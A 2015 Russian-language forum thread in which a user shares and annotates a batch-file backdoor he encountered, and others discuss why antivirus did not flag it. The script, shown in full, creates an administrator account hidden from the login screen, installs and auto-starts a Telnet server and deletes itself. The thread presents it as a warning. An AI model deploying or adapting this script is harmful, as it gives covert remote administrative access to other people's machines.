Интересный батник

Антивирусное ПО, опыт борьбы с вирусами и прочее

Модератор: mike 1

Ответить
Аватара пользователя

Автор темы
Stinger
Интересующийся
Сообщения: 38
Зарегистрирован: 14 июн 2015, 15:11
Есть ответ: 1
Репутация: 4
Статус: Не в сети

Интересный батник

Сообщение Stinger » 10 июл 2015, 14:30

Мне попался интересный бэкдор, построен на стандартных средствах Windows. Не знаю, можно ли его назвать в таком случае вирусом, но он позволяет удаленно управлять устройством через протокол Telnet, а точнее получить доступ к терминалу. Также на него не реагируют антивирусы, так как он является пакетным файлом.
Вот сам "вирус":

Код: Выделить всё

1. @echo off 								--  отключение вывода на экран
2. chcp 866 									-- изменение кодировки страницы на 866
3. net user Name Password /add 					-- создание учётной записи для протокола Telnet 
4. net localgroup Ђ¤¬Ё­Ёбва в®ал Name /add 			-- насколько я понял, это добавление в группу администраторов 
5. net accounts /maxpwage:unlimited 				-- строк действия учётной записи
6. reg add "HKLM\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon\
SpecialAccounts\UserList" /v Name /t REG_DWORD /d 0 /f  -- специальная учётная запись 
7. start "" /W pkgmgr /iu: "TelnetServer" 				-- установка службы Telnet
8. ::tlntadmn config port=8080 sec=-NTLM 				--редирект на другой порт (видимо для противостояния роутерам)
9. net localgroup "TelnetClients" Name /add 			--добавление учётки в группу Telnet
10. sc config tlntsvr start = auto 					-- автозапуск
11. net start telnet 								-- запуск службы
12. del %0                                                              		-- самоуничтожение
Рассчитан он на запуск от имени администратора и во время выполнения минуты 2 висит окно cmd. Конечно, это можно "профиксить" с помощью vbs.
И для атаки злоумышленнику нужен IP, так что думаю атака была направленной. Меня немного расстроило молчание антивируса, так что будьте бдительны и смотрите, что запускаете.

Аватара пользователя

DesignerMix
Администратор
Администратор
Сообщения: 5207
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 189
Репутация: 601
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Интересный батник

Сообщение DesignerMix » 10 июл 2015, 15:04

Stinger писал(а): Меня немного расстроило молчание антивируса, так что будьте бдительны и смотрите, что запускаете.
А почему антивирус должен был на него реагировать? Ведь в выполняемых командах нет ничего необычного, например какой-нибудь администратор вполне может написать подобный для удобства подключения к удаленным машинам.

Спасибо за интересную информацию!


c5f
Хранитель файлового архива
Хранитель файлового архива
Сообщения: 94
Зарегистрирован: 26 апр 2014, 20:59
Есть ответ: 3
Репутация: 27
Контактная информация:
Статус: Не в сети

Интересный батник

Сообщение c5f » 10 июл 2015, 20:13

Пользуйтесь linux или не пользуйтесь администраторской учётной записью в windows повсеместно. :ugeek:
В файловом архиве есть много схем ноутбуков и скоро будут добавляться другие полезные файлы. Заходите - http://www.dmyt.ru/forum/downloads.php

Аватара пользователя

Автор темы
Stinger
Интересующийся
Сообщения: 38
Зарегистрирован: 14 июн 2015, 15:11
Есть ответ: 1
Репутация: 4
Статус: Не в сети

Интересный батник

Сообщение Stinger » 10 июл 2015, 20:59

Stinger писал(а): управлять устройством через протокол Telnet, а точнее получить доступ к терминалу
А я разве писал что это бэкдор для Windows? В UNIX'ах тоже есть Telnet, а вообще протокол создан для удаленного кроссплатформенного управления, так что использование Linux вас не спасёт.

Отправлено спустя 16 минут 1 секунду:
Конечно, именно этот код работать не будет, но всё же его можно переработать и для Linux

Аватара пользователя

Endless8Space
Модератор
Модератор
Сообщения: 571
Зарегистрирован: 15 ноя 2014, 18:23
Есть ответ: 38
Репутация: 102
Откуда: Омск
Статус: Не в сети

Интересный батник

Сообщение Endless8Space » 12 июл 2015, 20:15

Stinger писал(а): Конечно, именно этот код работать не будет, но всё же его можно переработать и для Linux
Stinger писал(а): построен на стандартных средствах Windows

Аватара пользователя

Автор темы
Stinger
Интересующийся
Сообщения: 38
Зарегистрирован: 14 июн 2015, 15:11
Есть ответ: 1
Репутация: 4
Статус: Не в сети

Интересный батник

Сообщение Stinger » 12 июл 2015, 20:33

Я имел ввиду что можно реализовать "блокнотом", а служба Telnet, через которую и реализуется управление, есть и на линуксе.

Отправлено спустя 1 минуту 20 секунд:
И я же написал что можно написать (переделать) под Linux, так в чём проблема?

Аватара пользователя

Endless8Space
Модератор
Модератор
Сообщения: 571
Зарегистрирован: 15 ноя 2014, 18:23
Есть ответ: 38
Репутация: 102
Откуда: Омск
Статус: Не в сети

Интересный батник

Сообщение Endless8Space » 12 июл 2015, 21:22

[ref]Stinger[/ref], можно - можно переработать. Никаких проблем)

Аватара пользователя

Denis Akima
Новичок
Сообщения: 1
Зарегистрирован: 27 авг 2015, 12:40
Репутация: 0
Контактная информация:
Статус: Не в сети

Интересный батник

Сообщение Denis Akima » 08 сен 2015, 13:48

Stinger, можно уточнить четвёртую строку? У меня она некоректно отображается "4. net localgroup Ђ¤¬Ё­Ёбва в®ал Name /add "

Аватара пользователя

DesignerMix
Администратор
Администратор
Сообщения: 5207
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 189
Репутация: 601
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Интересный батник

Сообщение DesignerMix » 08 сен 2015, 14:35

Denis Akima писал(а): Ђ¤¬Ё­Ёбва в®ал
Здесь написано Адми­нистраторы. Автор темы кстати в комментариях к данной строке это и указал -- насколько я понял, это добавление в группу администраторов

Ответить

Вернуться в «Вирусы и их лечение»

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и 1 гость